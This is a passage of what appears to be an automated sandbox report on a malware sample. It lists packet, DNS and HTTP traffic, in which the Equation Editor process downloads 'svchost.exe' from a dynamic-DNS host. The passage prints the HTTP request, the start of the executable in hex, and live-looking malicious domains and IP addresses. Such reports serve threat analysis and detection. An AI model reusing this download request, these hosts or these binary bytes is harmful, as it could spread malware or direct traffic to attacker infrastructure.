                                                                                                                                                    Nov 26, 2020 09:03:44.814570904 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814599037 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814610958 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814636946 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814646959 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814673901 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814685106 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814713001 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814726114 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814752102 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814770937 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814798117 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814799070 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814841032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814851999 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814878941 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814888000 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814918041 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814928055 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814954996 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.814966917 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.814990997 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815002918 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815028906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815040112 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815068007 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815078974 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815114021 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815115929 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815155983 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815165997 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815193892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815207005 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815232992 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815243006 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815272093 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815280914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815308094 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815320969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815346003 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815355062 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815383911 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815393925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815433025 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815433979 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815474033 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815485954 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815510988 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815522909 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815548897 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815560102 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815587044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815596104 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815623999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815633059 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815661907 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815673113 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815701008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815711021 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815749884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815761089 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815793037 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815792084 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815829992 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815846920 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815875053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815912962 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815912962 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815939903 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815951109 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.815973043 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.815988064 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816004992 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816025019 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816036940 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816071033 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816071987 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816112995 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816121101 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816159964 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816170931 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816205978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816210032 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816247940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816261053 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816286087 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816297054 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816324949 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816334963 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816363096 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816378117 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816399097 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816407919 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816437006 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816448927 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816473961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816487074 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816519976 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816521883 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816561937 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816571951 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816598892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816607952 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816637039 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816649914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816674948 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816687107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816711903 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816734076 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816750050 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816766977 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816787958 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816797972 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816834927 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816838026 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816879988 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816889048 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816915989 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816919088 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816953897 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.816975117 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.816991091 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.817008972 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.817028999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:44.817040920 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.817073107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:44.821572065 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:45.415324926 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.415385962 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:45.639542103 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.639580965 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.639772892 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:45.862179041 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.862225056 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.862237930 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.862250090 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:45.862407923 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085491896 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085520029 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085541010 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085562944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085582972 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085587978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085604906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085608006 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085611105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085627079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085630894 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085648060 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085652113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.085659981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.085688114 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308047056 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308078051 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308095932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308111906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308128119 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308144093 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308156013 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308168888 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308185101 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308201075 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308217049 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308231115 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308235884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308253050 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308268070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308270931 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308278084 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308284044 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308284998 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308289051 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308295012 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308300018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308300972 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:46.308330059 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.308341980 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:46.872900963 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:04:47.257600069 CET4916680192.168.2.22216.130.188.93
                                                                                                                                                    Nov 26, 2020 09:04:47.360327005 CET8049166216.130.188.93192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:04:47.360481024 CET4916680192.168.2.22216.130.188.93
                                                                                                                                                    Nov 26, 2020 09:04:47.360749960 CET4916680192.168.2.22216.130.188.93
                                                                                                                                                    Nov 26, 2020 09:04:47.465672016 CET8049166216.130.188.93192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:04:47.465945005 CET4916680192.168.2.22216.130.188.93
                                                                                                                                                    Nov 26, 2020 09:04:47.466061115 CET4916680192.168.2.22216.130.188.93
                                                                                                                                                    Nov 26, 2020 09:04:47.568682909 CET8049166216.130.188.93192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.688767910 CET4916780192.168.2.2234.102.136.180
                                                                                                                                                    Nov 26, 2020 09:05:07.705286026 CET804916734.102.136.180192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.705373049 CET4916780192.168.2.2234.102.136.180
                                                                                                                                                    Nov 26, 2020 09:05:07.705564022 CET4916780192.168.2.2234.102.136.180
                                                                                                                                                    Nov 26, 2020 09:05:07.722182035 CET804916734.102.136.180192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.821191072 CET804916734.102.136.180192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.821245909 CET804916734.102.136.180192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.821486950 CET4916780192.168.2.2234.102.136.180
                                                                                                                                                    Nov 26, 2020 09:05:07.821567059 CET4916780192.168.2.2234.102.136.180
                                                                                                                                                    Nov 26, 2020 09:05:07.843933105 CET804916734.102.136.180192.168.2.22

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 26, 2020 09:03:41.977698088 CET5219753192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:03:42.049458981 CET53521978.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.049945116 CET5219753192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:03:42.085334063 CET53521978.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:04:47.181237936 CET5309953192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET53530998.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.648457050 CET5283853192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET53528388.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:27.941457033 CET6120053192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:05:27.992831945 CET53612008.8.8.8192.168.2.22

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Nov 26, 2020 09:03:41.977698088 CET192.168.2.228.8.8.80x5142Standard query (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:03:42.049945116 CET192.168.2.228.8.8.80x5142Standard query (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.181237936 CET192.168.2.228.8.8.80xa14dStandard query (0)www.affinitymotorsales.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.648457050 CET192.168.2.228.8.8.80xccffStandard query (0)www.setyourhead.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:27.941457033 CET192.168.2.228.8.8.80x2e78Standard query (0)www.akmh.proA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Nov 26, 2020 09:03:42.049458981 CET8.8.8.8192.168.2.220x5142No error (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:03:42.085334063 CET8.8.8.8192.168.2.220x5142No error (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET8.8.8.8192.168.2.220xa14dNo error (0)www.affinitymotorsales.comaffinitymotorsales.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET8.8.8.8192.168.2.220xa14dNo error (0)affinitymotorsales.com216.130.188.93A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET8.8.8.8192.168.2.220xccffNo error (0)www.setyourhead.comsetyourhead.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET8.8.8.8192.168.2.220xccffNo error (0)setyourhead.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:27.992831945 CET8.8.8.8192.168.2.220x2e78Name error (3)www.akmh.prononenoneA (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
                                                                                                                                                    • www.affinitymotorsales.com
                                                                                                                                                    • www.setyourhead.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:03:42.330790997 CET1OUTGET /worksdoc/svchost.exe HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                    Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 26, 2020 09:03:42.558485985 CET2INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 26 Nov 2020 08:03:38 GMT
                                                                                                                                                    Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                    Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT
                                                                                                                                                    ETag: "de000-5b4f69ba08c46"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 909312
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e e5 be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d4 0d 00 00 0a 00 00 00 00 00 00 1e f3 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 00 4b 00 00 00 00 00 0e 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 d3 0d 00 00 20 00 00 00 d4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 00 0e 00 00 08 00 00 00 d6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 de 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 6f 0b 00 08 83 02 00 03 00 00 00 31 00 00 06 f8 6a 02 00 d0 04 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 13 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a c9 00 00 00 20 fa 1b 25 b4 20 e0 3a 01 ac 61 25 0c 1d 5e 45 07 00 00 00 05 00 00 00 a9 00 00 00 4f 00 00 00 d0 ff ff ff 1f 00 00 00 99 00 00 00 7d 00 00 00 38 a4 00 00 00 28 03 00 00 06 0b 07 2d 08 20 aa a8 23 fc 25 2b 06 20 eb 5c c8 de 25 26 2b b6 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 2d 58 ab 08 25 2b 06 20 64 13 ed 55 25 26 08 20 2a ba e0 05 5a 61 2b 86 06 72 29 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2c 08 20 25 c7 bf 5f 25 2b 06 20 c0 c9 bb 2a 25 26 08 20 d9 02 38 4b 5a 61 38 58 ff ff ff 72 4d 00 00 70 28 10 00 00 06 08 20 a6 ef a1 bc 5a 20 58 2c c2 78 61 38 3c ff ff ff 14 28 0c 00 00 06 20 ca 8a 29 b0 38 2c ff ff ff 14 fe 06 07 00 00 06 73 1d 00 00 0a 28 11 00 00 06 25 17 28 12 00 00 06 14 28 13 00 00 06 2a 00 13 30 03 00 0b 00 00 00 01 00 00 11 7f 01 00 00 04 28 27 00 00 06 2a 00 1b 30 05 00 4c 02 00 00 03 00 00 11 02 75 03 00 00 01 0a 06 3a 99 00 00 00 20 e5 fb d6 35 20 58 bd 35 1e 61 25 0b 1f 0e 5e 45 0e 00 00 00 05 00 00 00 8b 00 00 00 1f 00 00 00 de 00 00 00 b3 ff ff ff 7a 01 00 00 f7 00 00 00 67 00 00 00 5f 01 00 00 4c 00
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_P @ @@K H.text$ `.rsrc@@.reloc @BHo1j0(*0rprp((: % :a%^EO}8(- #%+ \%&+((rp(, -X%+ dU%& *Za+r)p((, %_%+ *%& 8KZa8XrMp( Z X,xa8<( )8,s(%((*0('*0Lu: 5 X5a%^Ezg_L
